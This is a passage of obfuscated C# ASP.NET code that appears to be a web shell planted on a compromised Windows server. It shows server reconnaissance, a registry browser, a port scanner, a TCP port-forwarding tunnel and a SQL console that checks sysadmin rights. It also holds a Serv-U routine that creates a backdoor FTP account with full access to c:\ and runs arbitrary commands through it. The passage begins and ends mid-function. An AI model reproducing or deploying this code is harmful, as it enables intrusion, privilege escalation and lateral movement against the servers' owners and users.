1044. td1.Text=user.Rows[i][j].ToString();
1045. tr.Controls.Add(td1);
1046. VPa.Controls.Add(tr);
1047. }
1048. TableRow trn=new TableRow();
1049. for(int x=1;x<3;x++)
1050. {
1051. TableCell tdn=new TableCell();
1052. tdn.Attributes["style"]="height:2px;background-color:#bbbbbb;";
1053. trn.Controls.Add(tdn);
1054. VPa.Controls.Add(trn);
1055. }
1056. }
1057. }
1058. catch(Exception error)
1059. {
1060. PLd();
1061. }
1062. }
1063. public void pDVM()
1064. {
1065. try
1066. {
1067. RegistryKey EeZ=Registry.LocalMachine.OpenSubKey(@"SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp");
1068. string IKjwH=DdmPl(EeZ,"PortNumber");
1069. RegistryKey izN=Registry.LocalMachine.OpenSubKey(@"HARDWARE\DESCRIPTION\System\CentralProcessor");
1070. int cpu=izN.SubKeyCount;
1071. RegistryKey mQII=Registry.LocalMachine.OpenSubKey(@"HARDWARE\DESCRIPTION\System\CentralProcessor\0\");
1072. string NPPZ=DdmPl(mQII,"ProcessorNameString");
1073. WICxe();
1074. ghaB.Visible=true;
1075. Bin_H2_Title.InnerText="System Information >>";
1076. Bin_H2_Mac.InnerText="MAC Information >>";
1077. Bin_H2_Driver.InnerText="Driver Information >>";
1078. StringBuilder yEwc=new StringBuilder();
1079. StringBuilder hwJeS=new StringBuilder();
1080. StringBuilder jXkaE=new StringBuilder();
1081. yEwc.Append("<li><u>Server Domain : </u>"+Request.ServerVariables["SERVER_NAME"]+"</li>");
1082. yEwc.Append("<li><u>Server Ip : </u>"+Request.ServerVariables["LOCAL_ADDR"]+":"+Request.ServerVariables["SERVER_PORT"]+"</li>");
1083. yEwc.Append("<li><u>Terminal Port : </u>"+IKjwH+"</li>");
1084. yEwc.Append("<li><u>Server OS : </u>"+Environment.OSVersion+"</li>");
1085. yEwc.Append("<li><u>Server Software : </u>"+Request.ServerVariables["SERVER_SOFTWARE"]+"</li>");
1086. yEwc.Append("<li><u>Server UserName : </u>"+Environment.UserName+"</li>");
1087. yEwc.Append("<li><u>Server Time : </u>"+System.DateTime.Now.ToString()+"</li>");
1088. yEwc.Append("<li><u>Server TimeZone : </u>"+cCf("Win32_TimeZone").Rows[0]["Caption"]+"</li>");
1089. DataTable BIOS=cCf("Win32_BIOS");
1090. yEwc.Append("<li><u>Server BIOS : </u>"+BIOS.Rows[0]["Manufacturer"]+" : "+BIOS.Rows[0]["Name"]+"</li>");
1091. yEwc.Append("<li><u>CPU Count : </u>"+cpu.ToString()+"</li>");
1092. yEwc.Append("<li><u>CPU Version : </u>"+NPPZ+"</li>");
1093. DataTable upM=cCf("Win32_PhysicalMemory");
1094. Int64 oZnZV=0;
1095. for(int i=0;i<upM.Rows.Count;i++)
1096. {
1097. oZnZV+=Int64.Parse(upM.Rows[0]["Capacity"].ToString());
1098. }
1099. yEwc.Append("<li><u>Server upM : </u>"+mTG(oZnZV)+"</li>");
1100. DataTable dOza=cCf("Win32_NetworkAdapterConfiguration");
1101. for(int i=0;i<dOza.Rows.Count;i++)
1102. {
1103. hwJeS.Append("<li><u>Server MAC"+i+" : </u>"+dOza.Rows[i]["Caption"]+"</li>");
1104. if(dOza.Rows[i]["MACAddress"]!=string.Empty)
1105. {
1106. hwJeS.Append("<li style=\"list-style:none;\"><u>Address : </u>"+dOza.Rows[i]["MACAddress"]+"</li>");
1107. }
1108. }
1109. DataTable Driver=cCf("Win32_SystemDriver");
1110. for (int i=0; i<Driver.Rows.Count; i++)
1111. {
1112. jXkaE.Append("<li><u class='u1'>Server Driver"+i+" : </u><u class='u2'>"+Driver.Rows[i]["Caption"]+"</u> ");
1113. if (Driver.Rows[i]["PathName"]!=string.Empty)
1114. {
1115. jXkaE.Append("Path : "+Driver.Rows[i]["PathName"]);
1116. }
1117. else
1118. {
1119. jXkaE.Append("No path information");
1120. }
1121. jXkaE.Append("</li>");
1122. }
1123. Bin_Ul_Sys.InnerHtml=yEwc.ToString();
1124. Bin_Ul_NetConfig.InnerHtml=hwJeS.ToString();
1125. Bin_Ul_Driver.InnerHtml=jXkaE.ToString();
1126. }
1127. catch(Exception error)
1128. {
1129. xseuB(error.Message);
1130. }
1131. }
1132. public void ADCpk()
1133. {
1134. WICxe();
1135. APl.Visible=true;
1136. Bin_H2_Title.InnerText="Serv-U Exec >>";
1137. }
1138. public void lDODR()
1139. {
1140. string JGGg=string.Empty;
1141. string user=dNohJ.Value;
1142. string pass=NMd.Value;
1143. int port=Int32.Parse(HlQl.Value);
1144. string cmd=mHbjB.Value;
1145. string CRtK="user "+user+"\r\n";
1146. string jnNG="pass "+pass+"\r\n";
1147. string site="SITE MAINTENANCE\r\n";
1148. string mtoJb="-DELETEDOMAIN\r\n-IP=0.0.0.0\r\n PortNo=52521\r\n";
1149. string sutI="-SETDOMAIN\r\n-Domain=BIN|0.0.0.0|52521|-1|1|0\r\n-TZOEnable=0\r\n TZOKey=\r\n";
1150. string iVDT="-SETUSERSETUP\r\n-IP=0.0.0.0\r\n-PortNo=52521\r\n-User=bin\r\n-Password=binftp\r\n-HomeDir=c:\\\r\n-LoginMesFile=\r\n-Disable=0\r\n-RelPaths=1\r\n-NeedSecure=0\r\n-HideHidden=0\r\n-AlwaysAllowLogin=0\r\n-ChangePassword=0\r\n-QuotaEnable=0\r\n-MaxUsersLoginPerIP=-1\r\n-SpeedLimitUp=0\r\n-SpeedLimitDown=0\r\n-MaxNrUsers=-1\r\n-IdleTimeOut=600\r\n-SessionTimeOut=-1\r\n-Expire=0\r\n-RatioDown=1\r\n-RatiosCredit=0\r\n-QuotaCurrent=0\r\n-QuotaMaximum=0\r\n-Maintenance=System\r\n-PasswordType=Regular\r\n-Ratios=NoneRN\r\n Access=c:\\|RWAMELCDP\r\n";
1151. string zexn="QUIT\r\n";
1152. UHlA.Visible=true;
1153. try
1154. {
1155. tcp.Connect("127.0.0.1",port);
1156. tcp.ReceiveBufferSize=1024;
1157. NS=tcp.GetStream();
1158. Rev(NS);
1159. ZJiM(NS,CRtK);
1160. Rev(NS);
1161. ZJiM(NS,jnNG);
1162. Rev(NS);
1163. ZJiM(NS,site);
1164. Rev(NS);
1165. ZJiM(NS,mtoJb);
1166. Rev(NS);
1167. ZJiM(NS,sutI);
1168. Rev(NS);
1169. ZJiM(NS,iVDT);
1170. Rev(NS);
1171. Bin_Td_Res.InnerHtml+="<font color=\"green\"><b>Exec Cmd.................\r\n</b></font>";
1172. zvxm.Connect(Request.ServerVariables["LOCAL_ADDR"],52521);
1173. NS1=zvxm.GetStream();
1174. Rev(NS1);
1175. ZJiM(NS1,"user bin\r\n");
1176. Rev(NS1);
1177. ZJiM(NS1,"pass binftp\r\n");
1178. Rev(NS1);
1179. ZJiM(NS1,"site exec "+cmd+"\r\n");
1180. Rev(NS1);
1181. ZJiM(NS1,"quit\r\n");
1182. Rev(NS1);
1183. zvxm.Close();
1184. ZJiM(NS,mtoJb);
1185. Rev(NS);
1186. tcp.Close();
1187. }
1188. catch(Exception error)
1189. {
1190. xseuB(error.Message);
1191. }
1192. }
1193. protected void Rev(NetworkStream instream)
1194. {
1195. string FTBtf=string.Empty;
1196. if(instream.CanRead)
1197. {
1198. byte[] uPZ=new byte[1024];
1199. do
1200. {
1201. System.Threading.Thread.Sleep(50);
1202. int len=instream.Read(uPZ,0,uPZ.Length);
1203. FTBtf+=Encoding.Default.GetString(uPZ,0,len);
1204. }
1205. while(instream.DataAvailable);
1206. }
1207. Bin_Td_Res.InnerHtml+="<font color=red>"+FTBtf.Replace("\0","")+"</font>";
1208. }
1209. protected void ZJiM(NetworkStream instream,string Sendstr)
1210. {
1211. if(instream.CanWrite)
1212. {
1213. byte[] uPZ=Encoding.Default.GetBytes(Sendstr);
1214. instream.Write(uPZ,0,uPZ.Length);
1215. }
1216. Bin_Td_Res.InnerHtml+="<font color=blue>"+Sendstr+"</font>";
1217. }
1218. public void xFhz()
1219. {
1220. WICxe();
1221. kkHN.Visible=true;
1222. Bin_H2_Title.InnerText="RegShell >>";
1223. string txc=@"HKEY_LOCAL_MACHINE|HKEY_CLASSES_ROOT|HKEY_CURRENT_USER|HKEY_USERS|HKEY_CURRENT_CONFIG";
1224. vyX.Text="";
1225. foreach(string rootkey in txc.Split('|'))
1226. {
1227. vyX.Text+="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(rootkey)+"')\">"+rootkey+"</a> | ";
1228. }
1229. lFAvw();
1230. }
1231. protected void lFAvw()
1232. {
1233. qPdI.Text="";
1234. string txc=@"HKEY_LOCAL_MACHINE|HKEY_CLASSES_ROOT|HKEY_CURRENT_USER|HKEY_USERS|HKEY_CURRENT_CONFIG";
1235. TableRow tr;
1236. TableCell tc;
1237. foreach(string rootkey in txc.Split('|'))
1238. {
1239. tr=new TableRow();
1240. tc=new TableCell();
1241. string bg=OKM();
1242. tr.Attributes["onmouseover"]="this.className='focus';";
1243. tr.CssClass=bg;
1244. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
1245. tc.Width=Unit.Parse("40%");
1246. tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(rootkey)+"')\">"+rootkey+"</a>";
1247. tr.Cells.Add(tc);
1248. tc=new TableCell();
1249. tc.Width=Unit.Parse("60%");
1250. tc.Text="&lt;RootKey&gt;";
1251. tr.Cells.Add(tc);
1252. pLWD.Rows.Add(tr);
1253. }
1254. }
1255. protected void tpRQ(string Reg_Path)
1256. {
1257. if(!Reg_Path.EndsWith("\\"))
1258. {
1259. Reg_Path=Reg_Path+"\\";
1260. }
1261. qPdI.Text=Reg_Path;
1262. string cJG=Regex.Replace(Reg_Path,@"\\[^\\]+\\?$","");
1263. cJG=Regex.Replace(cJG,@"\\+","\\");
1264. TableRow tr=new TableRow();
1265. TableCell tc=new TableCell();
1266. string bg=OKM();
1267. tr.Attributes["onmouseover"]="this.className='focus';";
1268. tr.CssClass=bg;
1269. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
1270. tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(cJG)+"')\">Parent Key</a>";
1271. tc.Attributes["colspan"]="2" ;
1272. tr.Cells.Add(tc);
1273. pLWD.Rows.Add(tr);
1274. try
1275. {
1276. string subpath;
1277. string kDgkX=Reg_Path.Substring(Reg_Path.IndexOf("\\")+1,Reg_Path.Length-Reg_Path.IndexOf("\\")-1);
1278. RegistryKey rk=null;
1279. RegistryKey sk;
1280. if(Reg_Path.StartsWith("HKEY_LOCAL_MACHINE"))
1281. {
1282. rk=Registry.LocalMachine;
1283. }
1284. else if(Reg_Path.StartsWith("HKEY_CLASSES_ROOT"))
1285. {
1286. rk=Registry.ClassesRoot;
1287. }
1288. else if(Reg_Path.StartsWith("HKEY_CURRENT_USER"))
1289. {
1290. rk=Registry.CurrentUser;
1291. }
1292. else if(Reg_Path.StartsWith("HKEY_USERS"))
1293. {
1294. rk=Registry.Users;
1295. }
1296. else if(Reg_Path.StartsWith("HKEY_CURRENT_CONFIG"))
1297. {
1298. rk=Registry.CurrentConfig;
1299. }
1300. if(kDgkX.Length>1)
1301. {
1302. sk=rk.OpenSubKey(kDgkX);
1303. }
1304. else
1305. {
1306. sk=rk;
1307. }
1308. foreach(string innerSubKey in sk.GetSubKeyNames())
1309. {
1310. tr=new TableRow();
1311. tc=new TableCell();
1312. bg=OKM();
1313. tr.Attributes["onmouseover"]="this.className='focus';";
1314. tr.CssClass=bg;
1315. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
1316. tc.Width=Unit.Parse("40%");
1317. tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(Reg_Path+innerSubKey)+"')\">"+innerSubKey+"</a>";
1318. tr.Cells.Add(tc);
1319. tc=new TableCell();
1320. tc.Width=Unit.Parse("60%");
1321. tc.Text="&lt;SubKey&gt;";
1322. tr.Cells.Add(tc);
1323. pLWD.Rows.Add(tr);
1324. }
1325. TableRow cKVA=new TableRow();
1326. cKVA.Attributes["style"]="border-top:1px solid #fff;border-bottom:1px solid #ddd;";
1327. cKVA.Attributes["bgcolor"]="#dddddd";
1328. TableCell JlmW=new TableCell();
1329. JlmW.Attributes["colspan"]="2" ;
1330. JlmW.Attributes["height"]="5";
1331. cKVA.Cells.Add(JlmW);
1332. pLWD.Rows.Add(cKVA);
1333. foreach(string strValueName in sk.GetValueNames())
1334. {
1335. tr=new TableRow();
1336. tc=new TableCell();
1337. bg=OKM();
1338. tr.Attributes["onmouseover"]="this.className='focus';";
1339. tr.CssClass=bg;
1340. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
1341. tc.Width=Unit.Parse("40%");
1342. tc.Text=strValueName;
1343. tr.Cells.Add(tc);
1344. tc=new TableCell();
1345. tc.Width=Unit.Parse("60%");
1346. tc.Text=DdmPl(sk,strValueName);
1347. tr.Cells.Add(tc);
1348. pLWD.Rows.Add(tr);
1349. }
1350. }
1351. catch(Exception error)
1352. {
1353. xseuB(error.Message);
1354. }
1355. }
1356. public string DdmPl(RegistryKey sk,string strValueName)
1357. {
1358. object uPZ;
1359. string RaTGr="";
1360. try
1361. {
1362. uPZ=sk.GetValue(strValueName,"NULL");
1363. if(uPZ.GetType()==typeof(byte[]))
1364. {
1365. foreach(byte tmpbyte in(byte[])uPZ)
1366. {
1367. if((int)tmpbyte<16)
1368. {
1369. RaTGr+="0";
1370. }
1371. RaTGr+=tmpbyte.ToString("X");
1372. }
1373. }
1374. else if(uPZ.GetType()==typeof(string[]))
1375. {
1376. foreach(string tmpstr in(string[])uPZ)
1377. {
1378. RaTGr+=tmpstr;
1379. }
1380. }
1381. else
1382. {
1383. RaTGr=uPZ.ToString();
1384. }
1385. }
1386. catch(Exception error)
1387. {
1388. xseuB(error.Message);
1389. }
1390. return RaTGr;
1391. }
1392. public void vNCHZ()
1393. {
1394. WICxe();
1395. YwLB.Visible=true;
1396. Bin_H2_Title.InnerText="PortScan >>";
1397. }
1398. public void rAhe()
1399. {
1400. WICxe();
1401. iDgmL.Visible=true;
1402. dQIIF.Visible=false;
1403. Bin_H2_Title.InnerText="DataBase >>";
1404. }
1405. protected void OUj()
1406. {
1407. if(Dtdr.State==ConnectionState.Closed)
1408. {
1409. try
1410. {
1411. Dtdr.ConnectionString=MasR.Text;
1412. Kkvb.Connection=Dtdr;
1413. Dtdr.Open();
1414. }
1415. catch(Exception Error)
1416. {
1417. xseuB(Error.Message);
1418. }
1419. }
1420. }
1421. protected void fUzE()
1422. {
1423. if(Dtdr.State==ConnectionState.Open)
1424. Dtdr.Close();
1425. Dtdr.Dispose();
1426. Kkvb.Dispose();
1427. }
1428. public DataTable CYUe(string sqlstr)
1429. {
1430. OleDbDataAdapter da=new OleDbDataAdapter();
1431. DataTable Dstog=new DataTable();
1432. try
1433. {
1434. OUj();
1435. Kkvb.CommandType=CommandType.Text;
1436. Kkvb.CommandText=sqlstr;
1437. da.SelectCommand=Kkvb;
1438. da.Fill(Dstog);
1439. }
1440. catch(Exception)
1441. {
1442. }
1443. finally
1444. {
1445. fUzE();
1446. }
1447. return Dstog;
1448. }
1449. public DataTable[] Bin_Data(string query)
1450. {
1451. ArrayList list=new ArrayList();
1452. try
1453. {
1454. string str;
1455. OUj();
1456. query=query+"\r\n";
1457. MatchCollection gcod=new Regex("[\r\n][gG][oO][\r\n]").Matches(query);
1458. int EmRX=0;
1459. for(int i=0;i<gcod.Count;i++)
1460. {
1461. Match FJD=gcod[i];
1462. str=query.Substring(EmRX,FJD.Index-EmRX);
1463. if(str.Trim().Length>0)
1464. {
1465. OleDbDataAdapter FgzeQ=new OleDbDataAdapter();
1466. Kkvb.CommandType=CommandType.Text;
1467. Kkvb.CommandText=str.Trim();
1468. FgzeQ.SelectCommand=Kkvb;
1469. DataSet cDPp=new DataSet();
1470. FgzeQ.Fill(cDPp);
1471. for(int j=0;j<cDPp.Tables.Count;j++)
1472. {
1473. list.Add(cDPp.Tables[j]);
1474. }
1475. }
1476. EmRX=FJD.Index+3;
1477. }
1478. str=query.Substring(EmRX,query.Length-EmRX);
1479. if(str.Trim().Length>0)
1480. {
1481. OleDbDataAdapter VwB=new OleDbDataAdapter();
1482. Kkvb.CommandType=CommandType.Text;
1483. Kkvb.CommandText=str.Trim();
1484. VwB.SelectCommand=Kkvb;
1485. DataSet arG=new DataSet();
1486. VwB.Fill(arG);
1487. for(int k=0;k<arG.Tables.Count;k++)
1488. {
1489. list.Add(arG.Tables[k]);
1490. }
1491. }
1492. }
1493. catch(SqlException e)
1494. {
1495. xseuB(e.Message);
1496. rom.Visible=false;
1497. }
1498. return(DataTable[])list.ToArray(typeof(DataTable));
1499. }
1500. public void JIAKU(string instr)
1501. {
1502. try
1503. {
1504. OUj();
1505. Kkvb.CommandType=CommandType.Text;
1506. Kkvb.CommandText=instr;
1507. Kkvb.ExecuteNonQuery();
1508. }
1509. catch(Exception e)
1510. {
1511. xseuB(e.Message);
1512. }
1513. }
1514. public void dwgT()
1515. {
1516. try
1517. {
1518. OUj();
1519. if(WYmo.SelectedItem.Text=="MSSQL")
1520. {
1521. if(Pvf.SelectedItem.Value!="")
1522. {
1523. Dtdr.ChangeDatabase(Pvf.SelectedItem.Value.ToString());
1524. }
1525. }
1526. DataTable[] jxF=null;
1527. jxF=Bin_Data(jHIy.InnerText);
1528. if(jxF!=null && jxF.Length>0)
1529. {
1530. for(int j=0;j<jxF.Length;j++)
1531. {
1532. rom.PreRender+=new EventHandler(lRavM);
1533. rom.DataSource=jxF[j];
1534. rom.DataBind();
1535. for(int i=0;i<rom.Items.Count;i++)
1536. {
1537. string bg=OKM();
1538. rom.Items[i].CssClass=bg;
1539. rom.Items[i].Attributes["onmouseover"]="this.className='focus';";
1540. rom.Items[i].Attributes["onmouseout"]="this.className='"+bg+"';";
1541. }
1542. }
1543. }
1544. else
1545. {
1546. rom.DataSource=null;
1547. rom.DataBind();
1548. }
1549. rom.Visible=true;
1550. }
1551. catch(Exception e)
1552. {
1553. xseuB(e.Message);
1554. rom.Visible=false;
1555. }
1556. }
1557. public void xTZY()
1558. {
1559. try
1560. {
1561. if(WYmo.SelectedItem.Text=="MSSQL")
1562. {
1563. if(Pvf.SelectedItem.Value=="")
1564. {
1565. rom.DataSource=null;
1566. rom.DataBind();
1567. return;
1568. }
1569. }
1570. OUj();
1571. DataTable zKvOw=new DataTable();
1572. DataTable jxF=new DataTable();
1573. DataTable baVJV=new DataTable();
1574. if(WYmo.SelectedItem.Text=="MSSQL" && Pvf.SelectedItem.Value!="")
1575. {
1576. Dtdr.ChangeDatabase(Pvf.SelectedItem.Text);
1577. }
1578. zKvOw=Dtdr.GetOleDbSchemaTable(OleDbSchemaGuid.Tables,new Object[] { null,null,null,"SYSTEM TABLE" });
1579. jxF=Dtdr.GetOleDbSchemaTable(OleDbSchemaGuid.Tables,new Object[] { null,null,null,"TABLE" });
1580. foreach(DataRow dr in zKvOw.Rows)
1581. {
1582. jxF.ImportRow(dr);
1583. }
1584. jxF.Columns.Remove("TABLE_CATALOG");jxF.Columns.Remove("TABLE_SCHEMA");jxF.Columns.Remove("DESCRIPTION");jxF.Columns.Remove("TABLE_PROPID");
1585. rom.PreRender+=new EventHandler(lRavM);
1586. rom.DataSource=jxF;
1587. rom.DataBind();
1588. for(int i=0;i<rom.Items.Count;i++)
1589. {
1590. string bg=OKM();
1591. rom.Items[i].CssClass=bg;
1592. rom.Items[i].Attributes["onmouseover"]="this.className='focus';";
1593. rom.Items[i].Attributes["onmouseout"]="this.className='"+bg+"';";
1594. }
1595. rom.Visible=true;
1596. }
1597. catch(Exception e)
1598. {
1599. xseuB(e.Message);
1600. rom.Visible=false;
1601. }
1602. }
1603. private void lRavM(object sender,EventArgs e)
1604. {
1605. DataGrid d=(DataGrid)sender;
1606. foreach(DataGridItem item in d.Items)
1607. {
1608. foreach(TableCell t in item.Cells)
1609. {
1610. t.Text=t.Text.Replace("<","&lt;").Replace(">","&gt;");
1611. }
1612. }
1613. }
1614. public void vCf()
1615. {
1616. dQIIF.Visible=true;
1617. try
1618. {
1619. jHIy.InnerHtml=string.Empty;
1620. if(WYmo.SelectedItem.Text=="MSSQL")
1621. {
1622. rom.Visible=false;
1623. uXevN.Visible=true;
1624. irTU.Visible=true;
1625. OUj();
1626. DataTable ver=CYUe(@"SELECT @@VERSION");
1627. DataTable dbs=CYUe(@"SELECT name FROM master.dbo.sysdatabases");
1628. DataTable cdb=CYUe(@"SELECT DB_NAME()");
1629. DataTable rol=CYUe(@"SELECT IS_SRVROLEMEMBER('sysadmin')");
1630. DataTable YKrm=CYUe(@"SELECT IS_MEMBER('db_owner')");
1631. string jHlh=ver.Rows[0][0].ToString();
1632. string dbo=string.Empty;
1633. if(YKrm.Rows[0][0].ToString()=="1")
1634. {
1635. dbo="db_owner";
1636. }
1637. else
1638. {
1639. dbo="public";
1640. }
1641. if(rol.Rows[0][0].ToString()=="1")
1642. {
1643. dbo="<font color=blue>sa</font>";
1644. }
1645. string db_name=string.Empty;
1646. foreach(ListItem item in FGEy.Items)
1647. {
1648.  if(item.Selected=true)
1649.  {
1650.  item.Selected=false;
1651.  }
1652. }
1653. Pvf.Items.Clear();
1654. Pvf.Items.Add("-- Select a DataBase --");
1655. Pvf.Items[0].Value="";
1656. for(int i=0;i<dbs.Rows.Count;i++)
1657. {
1658. db_name+=dbs.Rows[i][0].ToString().Replace(cdb.Rows[0][0].ToString(),"<font color=blue>"+cdb.Rows[0][0].ToString()+"</font>")+"&nbsp;|&nbsp;";
1659. Pvf.Items.Add(dbs.Rows[i][0].ToString());
1660. }
1661. irTU.InnerHtml="<p><font color=red>MSSQL Version</font> : <i><b>"+jHlh+"</b></i></p><p><font color=red>SrvRoleMember</font> : <i><b>"+dbo+"</b></i></p>";
1662. }
1663. else
1664. {
1665. uXevN.Visible=false;
1666. irTU.Visible=false;
1667. xTZY();
1668. }
1669. }
1670. catch(Exception e)
1671. {
1672. dQIIF.Visible=false;
1673. }
1674. }
1675. public void MHLv()
1676. {
1677. WICxe();
1678. hOWTm.Visible=true;
1679. Bin_H2_Title.InnerText="PortMap >>";
1680. }
1681. public class PortForward
1682. {
1683. public string Localaddress;
1684. public int LocalPort;
1685. public string RemoteAddress;
1686. public int RemotePort;
1687. string type;
1688. Socket ltcpClient;
1689. Socket rtcpClient;
1690. Socket server;
1691. byte[] DPrPL=new byte[2048];
1692. byte[] wvZv=new byte[2048];
1693. public struct session
1694. {
1695. public Socket rdel;
1696. public Socket ldel;
1697. public int llen;
1698. public int rlen;
1699. }
1700. public static IPEndPoint mtJ(string host,int port)
1701. {
1702. IPEndPoint iep=null;
1703. IPHostEntry aGN=Dns.Resolve(host);
1704. IPAddress rmt=aGN.AddressList[0];
1705. iep=new IPEndPoint(rmt,port);
1706. return iep;
1707. }
1708. public void Start(string Rip,int Rport,string lip,int lport)
1709. {
1710. try
1711. {
1712. LocalPort=lport;
1713. RemoteAddress=Rip;
1714. RemotePort=Rport;
1715. Localaddress=lip;
1716. rtcpClient=new Socket(AddressFamily.InterNetwork,SocketType.Stream,ProtocolType.Tcp);
1717. ltcpClient=new Socket(AddressFamily.InterNetwork,SocketType.Stream,ProtocolType.Tcp);
1718. rtcpClient.BeginConnect(mtJ(RemoteAddress,RemotePort),new AsyncCallback(iiGFO),rtcpClient);
1719. }
1720. catch (Exception ex) { }
1721. }
1722. protected void iiGFO(IAsyncResult ar)
1723. {
1724. try
1725. {
1726. session RKXy=new session();
1727. RKXy.ldel=ltcpClient;
1728. RKXy.rdel=rtcpClient;
1729. ltcpClient.BeginConnect(mtJ(Localaddress,LocalPort),new AsyncCallback(VTp),RKXy);
1730. }
1731. catch (Exception ex) { }
1732. }
1733. protected void VTp(IAsyncResult ar)
1734. {
1735. try
1736. {
1737. session RKXy=(session)ar.AsyncState;
1738. ltcpClient.EndConnect(ar);
1739. RKXy.rdel.BeginReceive(DPrPL,0,DPrPL.Length,SocketFlags.None,new AsyncCallback(LFYM),RKXy);
1740. RKXy.ldel.BeginReceive(wvZv,0,wvZv.Length,SocketFlags.None,new AsyncCallback(xPS),RKXy);
1741. }
1742. catch (Exception ex) { }
1743. }
1744. private void LFYM(IAsyncResult ar)
1745. {
1746. try
1747. {
1748. session RKXy=(session)ar.AsyncState;
1749. int Ret=RKXy.rdel.EndReceive(ar);
1750. if (Ret>0)
1751. ltcpClient.BeginSend(DPrPL,0,Ret,SocketFlags.None,new AsyncCallback(JTcp),RKXy);
1752. else lyTOK();
1753. }
1754. catch (Exception ex) { }
1755. }
1756. private void JTcp(IAsyncResult ar)
1757. {
1758. try
1759. {
1760. session RKXy=(session)ar.AsyncState;
1761. RKXy.ldel.EndSend(ar);
1762. RKXy.rdel.BeginReceive(DPrPL,0,DPrPL.Length,SocketFlags.None,new AsyncCallback(this.LFYM),RKXy);
1763. }
1764. catch (Exception ex) { }
1765. }
1766. private void xPS(IAsyncResult ar)
1767. {
1768. try
1769. {
1770. session RKXy=(session)ar.AsyncState;
1771. int Ret=RKXy.ldel.EndReceive(ar);
1772. if (Ret>0)
1773. RKXy.rdel.BeginSend(wvZv,0,Ret,SocketFlags.None,new AsyncCallback(IZU),RKXy);
1774. else lyTOK();
1775. }
1776. catch (Exception ex) { }
1777. }
1778. private void IZU(IAsyncResult ar)
1779. {
1780. try
1781. {
1782. session RKXy=(session)ar.AsyncState;
1783. RKXy.rdel.EndSend(ar);
1784. RKXy.ldel.BeginReceive(wvZv,0,wvZv.Length,SocketFlags.None,new AsyncCallback(this.xPS),RKXy);
1785. }
1786. catch (Exception ex) { }
1787. }
1788. public void lyTOK()
1789. {
1790. try
1791. {
1792. if (ltcpClient!=null)
1793. {
1794. ltcpClient.Close();
1795. }
1796. if (rtcpClient!=null)
1797. rtcpClient.Close();
1798. }
1799. catch (Exception ex) { }
1800. }
1801. }
1802. protected void vuou()
1803. {
1804. PortForward gYP=new PortForward();
1805. gYP.lyTOK();
1806. }
1807. protected void ruQO()
1808. {
1809. PortForward gYP=new PortForward();
1810. gYP.Start(llH.Value,int.Parse(ZHS.Value),eEpm.Value,int.Parse(iXdh.Value));
1811. }
1812. public string mRDl(string instr)
1813. {
1814. string tmp=null;
1815. try
1816. {
1817. tmp=System.Net.Dns.Resolve(instr).AddressList[0].ToString();
1818. }
1819. catch(Exception e)
1820. {
1821. }
1822. return tmp;
1823. }
1824. public void VikG()
1825. {
1826. string[] OTV=lOmX.Text.ToString().Split(',');
1827. for(int i=0;i<OTV.Length;i++)
1828. {
1829. IVc.Add(new ScanPort(mRDl(MdR.Text.ToString()),Int32.Parse(OTV[i])));
1830. }
1831. try
1832. {
1833. Thread[] kbXY=new Thread[IVc.Count];
1834. int sdO=0;
1835. for(sdO=0;sdO<IVc.Count;sdO++)
1836. {
1837. kbXY[sdO]=new Thread(new ThreadStart(((ScanPort)IVc[sdO]).Scan));
1838. kbXY[sdO].Start();
1839. }
1840. for(sdO=0;sdO<kbXY.Length;sdO++)
1841. kbXY[sdO].Join();
1842. }
1843. catch
1844. {
1845. }
1846. }
1847. public class ScanPort
1848. {
1849. private string _ip="";
1850. private int jTdO=0;
1851. private TimeSpan _timeSpent;
1852. private string QGcH="Not scanned";
1853. public string ip
1854. {
1855. get { return _ip;}
1856. }
1857. public int port
1858. {
1859. get { return jTdO;}
1860. }
1861. public string status
1862. {
1863. get { return QGcH;}
1864. }
1865. public TimeSpan timeSpent
1866. {
1867. get { return _timeSpent;}
1868. }
1869. public ScanPort(string ip,int port)
1870. {
1871. _ip=ip;
1872. jTdO=port;
1873. }
1874. public void Scan()
1875. {
1876. TcpClient iYap=new TcpClient();
1877. DateTime qYZT=DateTime.Now;
1878. try
1879. {
1880. iYap.Connect(_ip,jTdO);
1881. iYap.Close();
1882. QGcH="<font color=green><b>Open</b></font>";
1883. }
1884. catch
1885. {
1886. QGcH="<font color=red><b>Close</b></font>";
1887. }
1888. _timeSpent=DateTime.Now.Subtract(qYZT);
1889. }
1890. }
1891. public static void YFcNP(System.Web.UI.Page page)
1892. {
1893. page.RegisterHiddenField("__EVENTTARGET","");
1894. page.RegisterHiddenField("__FILE","");
1895. string s=@"<script language=Javascript>";
1896. s+=@"function Bin_PostBack(eventTarget,eventArgument)";
1897. s+=@"{";
1898. s+=@"var theform=document.forms[0];";
1899. s+=@"theform.__EVENTTARGET.value=eventTarget;";
1900. s+=@"theform.__FILE.value=eventArgument;";
1901. s+=@"theform.submit();";
1902. s+=@"} ";
1903. s+=@"</scr"+"ipt>";
1904. page.RegisterStartupScript("",s);
1905. }
1906. protected void PPtK(object sender,EventArgs e)
1907. {
1908. WICxe();
1909. yhv.Visible=true;
1910. Bin_H2_Title.InnerText="File Search >>";
1911. NaLJ.Value=Request.PhysicalApplicationPath;
1912. oJiym.Visible=false;
1913. }
1914. protected void NBy(object sender,EventArgs e)
1915. {
1916. DirectoryInfo GQMM=new DirectoryInfo(NaLJ.Value);
1917. if(!GQMM.Exists)
1918. {
1919. xseuB("Path invalid ! ");
1920. return;
1921. }
1922. oog(GQMM);
1923. xseuB("Search completed ! ");
1924. }
1925. public void oog(DirectoryInfo dir)
1926. {
1927. try
1928. {
1929. oJiym.Visible=true;
1930. foreach(FileInfo Bin_Files in dir.GetFiles())
1931. {
1932. try
1933. {
1934. if(Bin_Files.FullName==Request.PhysicalPath)
1935. {
1936. continue;
1937. }
1938. if(!Regex.IsMatch(Bin_Files.Extension.Replace(".",""),"^("+UDLvA.Value+")$",RegexOptions.IgnoreCase))
1939. {
1940. continue;
1941. }
1942. if(Ven.SelectedItem.Value=="name")
1943. {
1944. if(rAQ.Checked)
1945. {
1946. if(Regex.IsMatch(Bin_Files.Name,iaMKl.Value,RegexOptions.IgnoreCase))
1947. {
